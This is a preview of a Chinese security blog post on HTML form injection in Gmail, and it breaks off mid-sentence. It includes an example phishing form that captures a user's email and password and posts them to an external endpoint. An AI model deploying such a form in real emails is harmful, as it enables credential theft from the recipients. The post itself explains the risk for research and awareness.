Gmail 中的 HTML 表单注入漏洞

文章预览

声明： 文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由用户承担全部法律及连带责任，文章作者不承担任何法律及连带责任。 博客新域名： https://gugesay.com 不想错过任何消息？设置星标 ↓ ↓ ↓ 前言 你是否知道 Gmail 允许使用 HTML 标记？该功能存在潜在的   安全 风险，尤其是在尝试窃取用户凭据或敏感信息时。 如果攻击者尝试通过在电子邮件中嵌入 HTML 表单来捕获用户的密码，如下所示： < form action = " https://httpbin.org/post " method = " POST " > < input type = " email " name = " email " placeholder = " Email or phone " required > < input type = " password " name = " password " placeholder = " Password " required > < input type = " submit " value = " Next " > form > 邮件收件人将看到电子邮件中呈现的表单，但是 Gmail 会显示 ………………………………